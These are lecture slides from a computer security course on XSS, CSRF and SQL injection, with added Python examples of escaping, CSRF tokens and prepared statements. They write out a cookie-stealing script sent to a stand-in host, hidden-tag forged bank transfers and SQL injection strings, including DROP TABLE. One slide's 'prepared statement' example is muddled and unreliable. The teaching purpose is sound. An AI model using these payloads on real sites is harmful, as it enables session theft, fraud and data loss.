CSCD 303 Essential Computer Security
Fall 2018
Lecture 17: XSS, SQL Injection and CSRF
Reading: See links at the end of the slides
Overview
- The idea of XSS, CSRF and SQL injection is to violate the security of the web browser/server system
- Inject content on web pages that tricks users, or
- Inject content on web pages that tricks web servers
- The result is stolen resources or destruction of information
Web Based Attacks
Application Layer
- Attacker sends attacks inside valid HTTP requests
- Your code is tricked into doing something it should not
- Security requires software development expertise
Network Layer
- Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests
(Diagram: an application attack passes through the network-layer firewall, hardened OS, web server and app server into the custom code and business functions, and on to back-end systems such as databases, legacy systems, web services and directories; an insider sits inside the firewall.)
Types of Web Attacks
- What kinds of web attacks are popular?
- Inadequate validation of user input
- Named attacks below:
  - Cross site scripting, XSS
  - Cross site request forgery, CSRF
  - SQL injection
Cross-site Scripting (XSS)
- Cross-site scripting (XSS) is a computer security vulnerability found in web applications
- Allows code injection by malicious web users into web pages viewed by other users
- Examples of such code include HTML code and client-side scripts
- An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy for scripts
- As of 2017 cross-site scripting is among the top 10 web site problems
  https://www.owasp.org/index.php/category:owasp_top_ten_2017_project
Same Origin Policy
- The intent is to let users visit untrusted web sites without those web sites interfering with the user's session with honest web sites
- The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin
- Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages
  http://www.w3.org/security/wiki/same_origin_policy

Outcome of access from a page served from http://store.company.com (default port):

URL                                              Outcome   Reason
http://store.company.com/dir2/other.html         Success
http://store.company.com/dir/inner/another.html  Success
https://store.company.com/secure.html            Failure   Different protocol
http://store.company.com:81/dir/etc.html         Failure   Different port
http://news.company.com/dir/other.html           Failure   Different host
Example Websites XSS'd
- A hacker was able to insert JavaScript code into the Obama community blog section
- The JavaScript would redirect users to the Hillary Clinton website
  http://www.youtube.com/watch?v=pas7kcgjkew
  http://www.crn.com/news/security/207401353/obama-website-hacked-users-redirected-to-clinton-campaign.htm
- Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple Computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs
- A list of websites with XSS is here: http://www.xssed.com/archive
- Example of an XSS attack: http://www.acunetix.com/websitesecurity/xss/
Cross Site Scripting (XSS): Recall
- Scripts embedded in web pages run in browsers
- Scripts can access cookies
  - Get private information
- Scripts can manipulate page objects
  - Control what users see
- Scripts are controlled by the same-origin policy
How could XSS occur?
- Web applications often take user inputs and use them as part of the webpage
Cross-Site Scripting (XSS) Attacks
XSS Example
- User input is echoed into the HTML response
- Example: search field
  http://victim.com/search.php?term=apple
- search.php responds with this page (the term is echoed with no escaping):

  <HTML>
  <TITLE> Search Results </TITLE>
  <BODY>
  Results for <?php echo $_GET['term']; ?> :...
  </BODY>
  </HTML>

- Is this exploitable?
XSS Example: Attacker's Bad Input
- Problem: no validation of the input term
- Consider this link:
  http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
- What if the user clicks on this link?
  1. The browser goes to victim.com/search.php
  2. victim.com returns
     <HTML> Results for <script> </script>
  3. The browser executes the script: it sends badguy.com the cookie for victim.com
More Details of XSS
- Why would a user click on such a link?
  - Phishing email in a webmail client (e.g. Gmail)
  - Link in a DoubleClick banner ad
  - Many, many ways to fool a user into clicking
- What if badguy.com gets the cookie for victim.com?
  - The cookie can include session authentication for victim.com
  - Or other data intended only for victim.com
  - This violates the same origin policy
- Let's see another picture of this with more details: https://excess-xss.com/
Consequences of XSS Attacks
- XSS can cause problems for the end user that range from annoyance to complete account compromise
- The most severe XSS attacks involve disclosure of the user's session cookie, allowing an attacker to hijack the user's session and take over the account
- Other results include disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, or modifying the presentation of content
XSS Examples
- More examples for your viewing pleasure
- Good link below with many cut and paste opportunities to try this out
- A complete how-to for XSS: https://www.owasp.org/index.php/cross-site_scripting_%28xss%29
Preventing XSS
- Escape all user input when it is displayed
- Escaping converts the output to harmless HTML entities
  <script> becomes &lt;script&gt;, which the browser still displays as <script> but does not execute
- Methods:
  - OWASP ESAPI
  - Java Standard Tag Library (JSTL) <c:out/>
  - OWASP XSS Prevention Cheat Sheet
    https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
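The search page from the XSS example rendered both ways, unescaped as on the slide and with the term converted to HTML entities, as an added example that is not part of the lecture slides. It assumes the query string has already been parsed and uses Python's html.escape in place of the Java/PHP escapers the slide names; the payload is the slide's own, constructed here as a string.

```python
import html
import re

# Constructed from the slide's attacker link; the query string is assumed already decoded.
PAYLOAD = '<script>window.open("http://badguy.com?cookie="+document.cookie)</script>'

TEMPLATE = "<HTML><TITLE>Search Results</TITLE><BODY>Results for {term} :...</BODY></HTML>"


def render_vulnerable(term):
    """Mirrors the slide's search.php: the term is echoed into the page unchanged."""
    return TEMPLATE.format(term=term)


def render_escaped(term):
    """Same page, but the term is converted to HTML entities before it is echoed.
    html.escape covers the HTML body context only; attribute and JavaScript contexts
    need their own encoders (see the OWASP cheat sheet)."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


# A <script start tag, case-insensitive, with optional whitespace after '<'.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(page):
    """Crude output check: does the rendered HTML still contain a real <script> start tag?"""
    return SCRIPT_TAG.search(page) is not None
```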
Preventing XSS: Security Expert Coding Recommendations
- http://www.jtmelton.com/tag/cross-site-scripting/
- .NET: use the Microsoft Anti-XSS Library
  http://msdn.microsoft.com/en-us/security/aa973814.aspx
XSS Prevention: NoScript Firefox Add-on
- NoScript: JavaScript, Java, Flash, Silverlight and possibly other executable content are blocked by default
- You will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust
- You must first enable JavaScript in Firefox
- http://noscript.net/features
Cross Site Request Forgery (CSRF)
What is Cross Site Request Forgery?
- Define it: Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request
- It is malicious in that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf:
  - Change the victim's e-mail address,
  - Change home address, or
  - Change password, or purchase something
How a CSRF Attack Unfolds
1. The attacker sets the trap on some website on the Internet (or simply via an e-mail); a hidden <img> tag contains the attack against the vulnerable site
2. While logged into the vulnerable site, the victim views the attacker's site; the <img> tag loaded by the browser sends a GET request (including credentials) to the vulnerable site
3. The vulnerable site sees a legitimate request from the victim and performs the action requested
(Diagram: the application with the CSRF vulnerability, its custom code, and business functions such as accounts, finance, administration, transactions, e-commerce, knowledge management and communication.)
Cross Site Request Forgery (CSRF)
- Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery
- Works by exploiting the trust of a site for the user
- In the case of XSS, the user is the victim
- In the case of CSRF, the user is an accomplice
- Example: http://site/stocks?buy=100&stock=ebay
  - Allows specific actions to be performed when requested
- If a user is logged into the site and an attacker tricks their browser into making a request to one of these task URLs, then the task is performed for the logged in user, but the user didn't intend to do it
Dangers of CSRF
- Most of the functionality allowed by a website can be performed by an attacker utilizing CSRF
- What does this mean for victims? This could include:
  - Posting content to a message board,
  - Subscribing to an online newsletter,
  - Performing stock trades, using a shopping cart, or
  - Even sending an e-card
CSRF: More Details
- The most popular ways to execute CSRF attacks: using the HTML image tag, or the JavaScript Image object
- An attacker will embed these into an email or website so that when the user loads the page or email, they perform a web request to any URL of the attacker's liking
- Examples follow
CSRF Code Examples
HTML methods
- IMG SRC:    <img src="http://host/?command">
- SCRIPT SRC: <script src="http://host/?command"></script>
- IFRAME SRC: <iframe src="http://host/?command"></iframe>
JavaScript methods
- 'Image' object:
  <script>
  var foo = new Image();
  foo.src = "http://host/?command";
  </script>
CSRF Example Detailed
- Say an online banking site performs a transfer of funds action by calling a URL such as:
  http://bigsafebank.com/transfer.do?acct=attacker&amount=1000
- This URL will transfer $1000 from a victim's account into the attacker's account if the victim is logged into their account within the BigSafeBank website
CSRF Example Detailed
- The attacker must fool the victim into clicking the link and executing the malicious action
- The attacker can create an HTML email with a tag such as:
  <img src="http://bigsafebank.com/transfer.do?acct=attacker&amount=1000" width="1" height="1" border="0">
- When a victim views this HTML email,
  - They will see an error indicating that the image could not be loaded,
  - But the browser still submits the transfer request to bigsafebank.com without requiring any further interaction from the user
CSRF Example Detailed
- The crazy part is: even though the image was rendered unsuccessfully,
- Using the <img> tag, an automatic HTTP request was made that contained the victim's credentials, i.e. the session cookie,
- Allowing the server to perform the malicious action
CSRF: Why Does it Happen?
- A web application's vulnerability to CSRF is due to the following conditions:
  - Use of certain HTML tags will result in automatic HTTP request execution
  - Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image
  - Loading of an image will happen regardless of where that image is located
CSRF: Why Does it Happen? More reasons why...
- Code within the web application performs security sensitive operations in response to requests without validation of the user
- GET requests are especially vulnerable to this type of attack, but POST requests are not immune
Fixing CSRF with CSRF Guard
- http://www.owasp.org/index.php/how_csrfguard_works
- The Open Web Application Security Project (OWASP) has a tool, CSRF Guard, that implements a session token to thwart CSRF attacks
- When the user first visits the site, the application will generate and store a session specific token
- This session specific token is then placed in each form and link of the HTML response, ensuring that this value will be submitted with the next request
- For each subsequent request, the application must verify the existence of the unique token parameter and compare its value to the value stored in the user's session
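The three steps of the session-token scheme described above (generate and store the token, embed it in the form, verify it on the next request), applied to the slide's BigSafeBank transfer, as an added example that is not part of the lecture slides or of OWASP CSRFGuard. It assumes an in-memory session store keyed by session id, and that the forged request, like the slide's <img> tag, carries the victim's session cookie but cannot carry a token the attacker never saw.

```python
import hmac
import secrets
from html import escape

# Assumed server state: session id -> session data (constructed, in-memory).
SESSIONS = {}


def start_session():
    """First visit: create a session and store a fresh, unguessable CSRF token in it."""
    session_id = secrets.token_urlsafe(16)
    SESSIONS[session_id] = {"csrf_token": secrets.token_urlsafe(32)}
    return session_id


def render_transfer_form(session_id):
    """Embed the session's token in the form so a legitimate submission carries it back."""
    token = SESSIONS[session_id]["csrf_token"]
    return ('<form method="POST" action="/transfer.do">'
            f'<input type="hidden" name="csrf_token" value="{escape(token)}">'
            '<input name="acct"><input name="amount">'
            '<input type="submit" value="Transfer"></form>')


def handle_transfer(session_id, params):
    """Subsequent request: refuse unless the submitted token matches the stored one.
    Returns (status, message) in place of a real HTTP response."""
    session = SESSIONS.get(session_id)
    if session is None:
        return 401, "no session"
    submitted = params.get("csrf_token")
    # A missing token, or one that differs from the token in the session, is rejected.
    # compare_digest keeps the comparison time independent of where the strings differ.
    if not submitted or not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {params['amount']} to {params['acct']}"
```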
SQL Injection
SQL Injection
- Very common vulnerability (~71 attacks/hour)
- Exploits web databases that:
  - Poorly validate user input for SQL string literal escape characters, e.g., '
  - Do not have strongly screened user input
- Example of escape characters:
  "SELECT * FROM users WHERE name = '" + username + "';"
- If username is set to ' or '1'='1, the resulting SQL is
  SELECT * FROM users WHERE name = '' OR '1'='1';
- This evaluates to SELECT * FROM users and displays all users
SQL Injection Example
- Select statement:
  "SELECT * FROM userinfo WHERE id = " + a_variable + ";"
- If the programmer doesn't check that a_variable is a number, the attacker can set
  a_variable = 1; DROP TABLE users
- The SQL evaluates to
  SELECT * FROM userinfo WHERE id=1; DROP TABLE users;
- Result of this query? The users table is deleted
Impact of SQL Injection: Dangerous
- At best: you can leak information
- Depending on your configuration, a hacker can:
  - Delete, alter or create data
  - Grant direct access to the hacker
  - Escalate privileges and even take over the OS
Preventing SQL Injection
- Use prepared statements
  $id = 1234
  "select * from accounts where id = " + $id
  The next one is safer and more exact:
  select * from accounts where id = 1234
- Validate input
  - Strong typing: if the id parameter is a number, try parsing it into an integer
  - Business logic validation
  - Escape questionable characters: ticks, --, semi-colon, brackets
- OWASP cheat sheet: https://www.owasp.org/index.php/sql_injection_prevention_cheat_sheet
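The two queries from the SQL injection slides run against a constructed in-memory SQLite table, once with string concatenation as on the slide and once with a prepared statement and strong typing as recommended here; an added example, not part of the lecture slides. It assumes Python's sqlite3 module and a small users table built inline.

```python
import sqlite3


def make_db():
    """Constructed users table standing in for the slide's web database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def find_user_vulnerable(conn, username):
    """The slide's pattern: the username is spliced straight into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT * FROM users WHERE name = '" + username + "';"
    return conn.execute(sql).fetchall()


def find_user_prepared(conn, username):
    """Prepared statement: the value is bound as data and never parsed as SQL."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (username,)).fetchall()


def find_user_by_id(conn, id_param):
    """Strong typing for the slide's numeric id: parse first, bind the integer second.
    Input that is not an integer (such as the slide's '1; DROP TABLE users') is
    rejected before any SQL is built from it."""
    try:
        user_id = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM users WHERE rowid = ?", (user_id,)).fetchall()
```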
Summary
- Experts suggest the Internet security model is completely flawed
- Made worse by Web 2.0
- As developers we can at least ensure our code is not broken
- As users we have far less control: browser security!!!!
References: CSRF Links
- CGI FAQ on Cross Site Request Forgery (CSRF): http://www.cgisecurity.com/articles/csrf-faq.shtml
- Art of Software Security Assessment, Same Origin: http://taossa.com/index.php/2007/02/08/same-origin-policy/
- OWASP CSRF site: http://www.owasp.org/index.php/csrf
- MSDN article on CSRF explained: http://msdn.microsoft.com/en-us/testing/cc664492.aspx
- Wikipedia: http://en.wikipedia.org/wiki/crosssite_request_forgery
References: XSS
- http://www.cgisecurity.com/articles/xss-faq.shtml
- http://sandsprite.com/sleuth/papers/realworld_xss_1.html
- http://msdn.microsoft.com/en-us/testing/cc664492.aspx
- http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
References: SQL Injection
- SQL Injection Cheat Sheet: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
- SQL Prevention: http://www.marcofolio.net/features/how_you_can_prevent_an_sql_injection.html
- SQL Attacks from UnixWiz: http://www.unixwiz.net/techtips/sql-injection.html
- OWASP SQL Injection: https://www.owasp.org/index.php/sql_injection_prevention_cheat_Sheet
End
- Lab this week: XSS, CSRF and SQL Injection